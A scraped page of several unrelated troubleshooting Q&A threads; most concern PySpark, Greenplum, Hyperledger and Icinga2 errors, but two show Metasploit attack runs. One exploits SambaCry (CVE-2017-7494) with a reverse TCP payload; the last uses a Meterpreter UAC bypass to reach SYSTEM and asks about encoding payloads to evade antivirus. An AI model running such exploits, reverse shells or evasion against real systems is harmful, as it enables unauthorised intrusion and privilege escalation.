unable to exploit samba cry valnurability using metasploit - metasploit

I am trying to exploit linux kernel vulnerability samba cry (CVE-2017-7494) for some research work using metasploit framework. But I get following error msf exploit(is_known_pipename) > run
[*] Started reverse TCP handler on 192.168.78.136:4444
[*] 192.168.78.139:445 - Using location \\192.168.78.139\myshare\ for the
path#
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare'
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared
[*] 192.168.78.139:445 - Uploaded payload to
\\192.168.78.139\myshare\BsdRHcSh.so
[*] 192.168.78.139:445 - Loading the payload from server-side path
/shared/BsdRHcSh.so using \\PIPE\/shared/BsdRHcSh.so...
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.78.139:445 - Loading the payload from server-side path
/shared/BsdRHcSh.so using /shared/BsdRHcSh.so...
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.
is it because my target host is not valnurable or any other issue? My target host has samba version- 3.6.23 which as far as I know is valnurable.
thanks

Failed to load STATUS_OBJECT_NAME_NOT_FOUND means "The object name is not found."
Probably metasploit failed to upload the payload in the shared folder.
Can you try to execute nmap and verify the presence of the vulnerability?
The command is
nmap -p445 --script smb-vuln-ms17-010 TARGET_IP

Related

Jupyter Notebook error while using PySpark Kernel: the code failed because of a fatal error: Error sending http request

I and using jupyter notebook's PySpark kernel, I have successfully selected PySpark kernel but I keep getting the below error
The code failed because of a fatal error:
Error sending http request and maximum retry encountered..
Some things to try:
a) Make sure Spark has enough available resources for Jupyter to create a Spark context.
b) Contact your Jupyter administrator to make sure the Spark magics library is configured correctly.
c) Restart the kernel.
here's the log also
2019-10-10 13:37:43,741 DEBUG SparkMagics Initialized spark magics.
2019-10-10 13:37:43,742 INFO EventsHandler InstanceId: 32a21583-6879-4ad5-88bf-e07af0b09387,EventName: notebookLoaded,Timestamp: 2019-10-10 10:37:43.742475
2019-10-10 13:37:43,744 DEBUG python_jupyter_kernel Loaded magics.
2019-10-10 13:37:43,744 DEBUG python_jupyter_kernel Changed language.
2019-10-10 13:37:44,356 DEBUG python_jupyter_kernel Registered auto viz.
2019-10-10 13:37:45,440 INFO EventsHandler InstanceId: 32a21583-6879-4ad5-88bf-e07af0b09387,EventName: notebookSessionCreationStart,Timestamp: 2019-10-10 10:37:45.440323,SessionGuid: d230b1f3-6bb1-4a66-bde1-7a73a14d7939,LivyKind: pyspark
2019-10-10 13:37:49,591 ERROR ReliableHttpClient Request to 'http://localhost:8998/sessions' failed with 'HTTPConnectionPool(host='localhost', port=8998): Max retries exceeded with url: /sessions (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x0000013184159808>: Failed to establish a new connection: [WinError 10061] No connection could be made because the target machine actively refused it'))'
2019-10-10 13:37:49,591 INFO EventsHandler InstanceId: 32a21583-6879-4ad5-88bf-e07af0b09387,EventName: notebookSessionCreationEnd,Timestamp: 2019-10-10 10:37:49.591650,SessionGuid: d230b1f3-6bb1-4a66-bde1-7a73a14d7939,LivyKind: pyspark,SessionId: -1,Status: not_started,Success: False,ExceptionType: HttpClientException,ExceptionMessage: Error sending http request and maximum retry encountered.
2019-10-10 13:37:49,591 ERROR SparkMagics Error creating session: Error sending http request and maximum retry encountered.
note that I am trying to configure this on windows.
thanks alot
I faced the same issue, you can solve it by not using a PySpark Kernel (notebook) but a Python 3 kernel (notebook). I used the following code to setup the Spark cluster:
import pyspark # only run after findspark.init()
from pyspark.sql import SparkSession
# May take awhile locally
spark = SparkSession.builder.appName("test").getOrCreate()
spark
If you are trying to connect your Jupyter Notebook to a Spark server through Livy (e.g. AWS Glue Development Endpoint), you have to replace "localhost" with the Spark server IP address in: ~/.sparkmagic/config.json
As mentioned here:
https://aws.amazon.com/blogs/machine-learning/build-amazon-sagemaker-notebooks-backed-by-spark-in-amazon-emr/
Posting below answer as it may help someone facing this issue when using sagemaker notebook with Glue Dev Endpoint.
I received same error message in my PySpark kernel notebook. In my case issue was missing Lifecycle configuration attached to notebook instance which was somehow removed. I delete and recreate dev endpoint every day but it lifecycle config normally remains attached to notebook.

failed to install greenplum command center when running gpccinstall

I downloaded greenplum-cc-web-4.6.1-LINUX-x86_64.zip for my greenplum db with 5.18, and followed this link (https://gpcc.docs.pivotal.io/460/topics/setup-collection-agents.html) to install command center. Everything is OK while there is a failure about gpccinstall. It showed following errors:
RunCommandOnEachHost fail on host: client-gp03.bj
Error when unzip remote binary on sdw3 bin/gpccws
bin/ccagent
bin/gpcc
conf/app.conf
gpcc_path.sh
bin/start_agent.sh
bin/queryinfocat.sh
bin/gpcc_md5
ccdata/
alert-email/alertTemplate.html
alert-email/send_alert.sh.sample
languages/
languages/zh.json
languages/en.json
Error when unzip remote binary on client-gp00.bj bin/gpccws
bin/ccagent
bin/gpcc
conf/app.conf
gpcc_path.sh
bin/start_agent.sh
bin/queryinfocat.sh
bin/gpcc_md5
ccdata/
alert-email/alertTemplate.html
alert-email/send_alert.sh.sample
languages/
languages/zh.json
languages/en.json
Error when unzip remote binary on client-gp01.bj bin/gpccws
bin/ccagent
bin/gpcc
conf/app.conf
gpcc_path.sh
bin/start_agent.sh
bin/queryinfocat.sh
bin/gpcc_md5
ccdata/
alert-email/alertTemplate.html
alert-email/send_alert.sh.sample
languages/
languages/zh.json
languages/en.json
Error when unzip remote binary on client-gp02.bj bin/gpccws
bin/ccagent
bin/gpcc
conf/app.conf
gpcc_path.sh
bin/start_agent.sh
bin/queryinfocat.sh
bin/gpcc_md5
ccdata/
alert-email/alertTemplate.html
alert-email/send_alert.sh.sample
languages/
languages/zh.json
languages/en.json
Error when unzip remote binary on client-gp03.bj Warning: the ECDSA host key for 'client-gp03.bj' differs from the key for the IP address '10.136.173.8'
Offending key for IP in /home/gpadmin/.ssh/known_hosts:10
Matching host key in /home/gpadmin/.ssh/known_hosts:17
tar: bin/gpccws: Cannot open: File exists
tar: Exiting with failure status due to previous errors
RunCommandOnEachHost failure happened
Can anyone encounter this issue before? I did some search in google and pivotal community, but failed to find some solution. Any help is appreciated.
BTW, when I ignored above errors, and continued, I found the gpcc web server can be started successfully. And when I logged in, only "Query Monitor" UI section show one warning: "GPCC is no longer receiving updates. Check your network status or gpcc status and refresh this page.", other part of UI seems OK.
From here:
Error when unzip remote binary on client-gp03.bj Warning: the ECDSA host key for 'client-gp03.bj' differs from the key for the IP address '10.136.173.8'
Offending key for IP in /home/gpadmin/.ssh/known_hosts:10
Matching host key in /home/gpadmin/.ssh/known_hosts:17
tar: bin/gpccws: Cannot open: File exists
tar: Exiting with failure status due to previous errors
You have duplicate ssh fingerprint keys in your /home/gpadmin/.ssh/known_hosts file. I recommend removing both lines 10 and 17 from that file, then running ssh-keyscan client-gp03.bj >> /home/gpadmin/.ssh/known_hosts
After this is complete, try ssh-ing to the host, to see that the fingerprint error is cleared up, and if so, try the gpcc installation again.

BYFN.sh failed with error when setting up MSP of type bccsp

I am trying the first-network demo on OS X and am getting the following error. I have tried searching for an answer. I did found one here but it appears that is for Ubuntu. All the commands didn't work on OS X.
Can anyone suggest a solution on OS X? Thanks!
2018-11-02 03:13:45.696 UTC [main] main -> ERRO 001 Cannot run peer
because error when setting up MSP of type bccsp from directory
/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/peerOrganizations/org1.example.com/users/Admin#org1.example.com/msp:
could not initialize BCCSP Factories: Failed initializing PKCS11.BCCSP
%!s(): Could not initialize BCCSP PKCS11 [Failed to initialize
software key store: An invalid KeyStore path provided. Path cannot be
an empty string.] !!!!!!!!!!!!!!! Channel creation failed
!!!!!!!!!!!!!!!!
========= ERROR !!! FAILED to execute End-2-End Scenario ==========
The error message is not very specific.
In my case, I was trying to connect to a peer from my fabric-tools container, and there was a TLS enabled mismatch (fabric-tools has TLS enabled, and fabric-peer had TLS disabled). Aligning the TLS configuration made the error go away.
Might help someone out...

Icinga2 does not start because he could not load library "db_ido_mysql"

Here is the Error:
root#taurus:/etc/icinga2/features-available# service icinga2 checkconfig
* checking Icinga2 configuration
information/cli: Icinga application loader (version: r2.7.2-1)
information/cli: Loading configuration file(s).
critical/config: Error: Error while evaluating expression: Could not load library 'libdb_ido_mysql.so.2.7.2': libdb_ido_mysql.so.2.7.2: cannot open shared object file: No such file or directory
Location: in /etc/icinga2/features-enabled/ido-mysql.conf: 6:1-6:22
/etc/icinga2/features-enabled/ido-mysql.conf(4): */
/etc/icinga2/features-enabled/ido-mysql.conf(5):
/etc/icinga2/features-enabled/ido-mysql.conf(6): library "db_ido_mysql"
^^^^^^^^^^^^^^^^^^^^^^
/etc/icinga2/features-enabled/ido-mysql.conf(7):
/etc/icinga2/features-enabled/ido-mysql.conf(8): object IdoMysqlConnection "ido-mysql" {
* checking Icinga2 configuration. Check '/var/log/icinga2/startup.log' for details.
root#taurus:/etc/icinga2/features-available# icinga2 feature list
Disabled features: command compatlog debuglog gelf graphite influxdb livestatus opentsdb perfdata statusdata syslog
Enabled features: api checker ido-mysql ido-pgsql mainlog notification
Does anybody know what i did wrong during the installation?
there were no problems, i dont get the answer.
Do you want to use Icingaweb2 with your Icinga2 installation? Then you have to install the
icinga2-ido-mysql
Package for your distribution and configure it. Here you can find a step by step instruction on how to install and configure it. If not, disable the following features:
ido-mysql ido-pgsql
Regards,
Jan

metasploit: bypassuac windows privilege escalation hangs

post/windows/escalate/bypassuac seems to fail for me
For some reason I can't get the post exploitation module bypassuac to work.
This is what I did:
Opened a meterpreter session on the target machine (as the NETWORKSERVICE user)
Put the session in background
Tried to use the post exploitation module like this:
use post/windows/escalate/bypassuac
set SESSION 1
set LHOST 192.168.1.100
set LPORT 4444 exploit
The port is not used yet so should be fine.
The output is as follows:
[-] Handler failed to bind to 192.168.1.100:4444
[] Started reverse handler on 0.0.0.0:4444
[] Starting the payload handler...
[] Uploading the bypass UAC executable to the filesystem...
[] Meterpreter stager executable 73802 bytes long being uploaded..
[] Uploaded the agent to the filesystem....
[] Post module execution completed
Then it returns to the console and does nothing, no new session, nothing whatsoever.
I checked the following things:
Uploading the executable bypassuac-x86.exe manually to the target. That worked perfectly fine.
Checked whether the virusscanner's alarm bells didn't ring from the executable. They didn't
Is there a way of manually running the executable and could someone explain me how that would work to open a new meterpreter session with SYSTEM level access?
Or can I somehow encode the payload and use my custom template to evade all antivirus possibilities? I haven't found any option to encode post-exploitation modules yet.
Thanks in advance
Halvar
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)
msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…
meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo

Resources